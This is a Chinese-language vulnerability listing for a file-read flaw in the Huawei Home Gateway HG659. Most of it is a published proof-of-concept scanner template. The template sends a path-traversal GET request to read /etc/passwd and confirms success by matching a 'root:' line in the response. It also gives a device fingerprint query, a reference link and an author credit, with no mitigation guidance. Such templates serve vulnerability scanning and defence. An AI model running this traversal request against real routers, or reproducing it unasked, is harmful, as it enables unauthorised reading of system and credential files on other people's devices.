huawei-home-gateway-hg659-fileread: Huawei Home Gateway Hg659 Fileread

日期: 2025-09-01 | 影响软件: Huawei Home Gateway Hg659 | POC: 已公开

漏洞描述

app="HUAWEI-Home-Gateway-HG659"

PoC代码[已公开]

id: huawei-home-gateway-hg659-fileread

info:
    name: Huawei Home Gateway Hg659 Fileread
    author: B1anda0(https://github.com/B1anda0)
    severity: high
    description: |
        app="HUAWEI-Home-Gateway-HG659"
    reference:
        - http://wiki.peiqi.tech/wiki/iot/%E5%8D%8E%E4%B8%BA/Huawei%20HG659%20lib%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html

rules:
    r0:
        request:
            method: GET
            path: /lib///....//....//....//....//....//....//....//....//etc//passwd
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

相关漏洞推荐